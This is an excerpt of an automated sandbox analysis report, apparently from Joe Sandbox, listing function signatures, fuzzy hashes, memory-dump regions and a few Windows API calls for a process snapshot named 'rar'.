                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                              • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                              • Instruction ID: 4472206d43b564dc829cae99293f9f0744f59e0b4338d301184eea24bcf84845
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68214F7AA0864186E638DF19E05066E7761FB88BA5F445336DF9D83BA5CF3CE445CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr$swprintf
                                                                                                                                                                                                                              • String ID: %c:\
                                                                                                                                                                                                                              • API String ID: 1303626722-3142399695
                                                                                                                                                                                                                              • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                              • Instruction ID: 0fbcf93390194c678493e20de7c43d42866ad66c1012fd5a6437dea945e3aaec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17115E62A18781C1EE24AF1595060AE6771BF4DB90B588635DF6E937F6DF3CF4618200
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                                                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                                                                                                                                              • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                              • Instruction ID: a5a589ea4b56c12e3ae1473805056d1b2454d0c6c2c5aed642c8ee8c38d83563
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C611D632B0568186F758CF2AE4043AA32A2FBDCB58F188539CB4D4B669CF7DD456C780
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 904936192-0
                                                                                                                                                                                                                              • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                              • Instruction ID: 0ff45f15d37238b6d81994ede0f3b9cb566d66393e7a1f04ca8d76d8aea5f286
• Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
• Instruction Fuzzy Hash: 9F51E162A1AA8581EB58CF2AD4603AD73A1FB88B98F448335DF5E877A5DF7CD511C300
APIs
• CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF6BBCCF6FC,00000000,?,?,?,?,00007FF6BBCD097D), ref: 00007FF6BBCD38CD
• CreateFileW.KERNEL32(?,?,?,?,?,00007FF6BBCCF6FC,00000000,?,?,?,?,00007FF6BBCD097D,?,?,00000000), ref: 00007FF6BBCD391F
• SetFileTime.KERNEL32(?,?,?,?,?,00007FF6BBCCF6FC,00000000,?,?,?,?,00007FF6BBCD097D,?,?,00000000), ref: 00007FF6BBCD399B
• CloseHandle.KERNEL32(?,?,?,?,?,00007FF6BBCCF6FC,00000000,?,?,?,?,00007FF6BBCD097D,?,?,00000000), ref: 00007FF6BBCD39A6
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
• Opcode ID: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
• Instruction ID: 402c295a393061b9c89e9c9b36b88252d5370bf722e2be28b44faf20d67d7b1c
• Opcode Fuzzy Hash: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
• Instruction Fuzzy Hash: 9F41D026B8C68242EA54CB19B41977A66B1BBC97A4F504231EF9D877F4DF3CD4098700
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ExceptionThrowstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 932687459-0
• Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
• Instruction ID: 20ebc6495e615453022bea2edd0ae11cccdb016b6f05bf197c72b8d69653c724
• Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
• Instruction Fuzzy Hash: F341E751E0CAC699EB5ADB29D0703FD2390FF48B84F980A32DB4D867A9DF2CE4458314
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
• String ID:
• API String ID: 4141327611-0
• Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
• Instruction ID: f0ab6bc7c17a318c3a9382fbdbf2b2f25fb7f6ba114c61f037e101ed7aa1bd68
• Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
• Instruction Fuzzy Hash: A6417422A0D79246FB6A8A59D050379B691FF48B94F5C4331DF4D86AE9DF3CE4818B00
APIs
• CreateFileW.KERNEL32(?,00007FF6BBCB86CB,?,?,?,00007FF6BBCBA5CB,?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2DF9), ref: 00007FF6BBCCD09D
• CreateFileW.KERNEL32(?,00007FF6BBCB86CB,?,?,?,00007FF6BBCBA5CB,?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2DF9), ref: 00007FF6BBCCD0E5
• CreateFileW.KERNEL32(?,00007FF6BBCB86CB,?,?,?,00007FF6BBCBA5CB,?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2DF9), ref: 00007FF6BBCCD114
• CreateFileW.KERNEL32(?,00007FF6BBCB86CB,?,?,?,00007FF6BBCBA5CB,?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2DF9), ref: 00007FF6BBCCD15C
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
• Instruction ID: 0ea5d7963f3b8b8035f744060ace3f2121ef995ccf5a173bcb3785721842af96
• Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
• Instruction Fuzzy Hash: DE316C32618B8582E7608F15E5587AA77A0F789BB8F505329EBAC47BD8CF3CD0448B44
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1171435874-0
                                                                                                                                                                                                                              • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                              • Instruction ID: 5802ce86221d8b65febfd05e18665a82855db271f53f8ab24b8742fc39a73979
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8115E32E08642CBF665CB18E49823C6271FFAC744F200474C70E976A1DF2CB84D5704
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ErrorLast$abort
• String ID:
• API String ID: 1447195878-0
• Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
• Instruction ID: f5399774227cd9553d3ee0b274ecd41352ee2c8bd120fd2cb602ac1d5c00702d
• Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
• Instruction Fuzzy Hash: 56019E20B0E65346FA5CA73DD65513C5191BF4CBC8F084738DB1E86BF2ED2DE8014A44
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 502429940-0
• Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction ID: f1f8d544e9aaece3cf0d2240f9d6c97760935cc726a522e4a9591444f10d27a7
• Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction Fuzzy Hash: 3F115E32A14A819BE618DF29E95466DA330FB8EBA0F100331DBAD536B5CF39E475C744
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: gfffffff
• API String ID: 3215553584-1523873471
• Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction ID: 13a04e24f140839cdb1d067a46b39c20605fc959d9a6b23dc2a82410b2bddb73
• Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction Fuzzy Hash: 85911862B0A39646EB198F2DE18037C6B55BB697D4F088232CB8D877A5DE3DE511C301
APIs
  • Part of subcall function 00007FF6BBCFB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6BBCCCBED,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCFB730
• new.LIBCMT ref: 00007FF6BBCECFD9
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: Sleep
• String ID: rar$rev
• API String ID: 3472027048-2145959568
• Opcode ID: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
• Instruction ID: bee6decd8242054e41c828aeefc14bd2c69e487eb063f63b71c1fc74301f2931
• Opcode Fuzzy Hash: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
• Instruction Fuzzy Hash: EEA1BF22A28692C2EA24DB28D45E2BD6375FF4C794F554032EB5D8B6E6EF2CF544C300
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: *
• API String ID: 3215553584-163128923
• Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction ID: d4623b319e7581db6ab2f034d5355e836de3e5e48cacf79df4fe5fe642e1e660
• Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction Fuzzy Hash: 8C715B7290865286E76C8F2D906557C3BA0FB49F08FB41336DB4AC22A8DF3DE981D745
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: the same ten dump regions (00007FF6BBCB0000 through 00007FF6BBD5E000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: e+000$gfff
• API String ID: 3215553584-3030954782
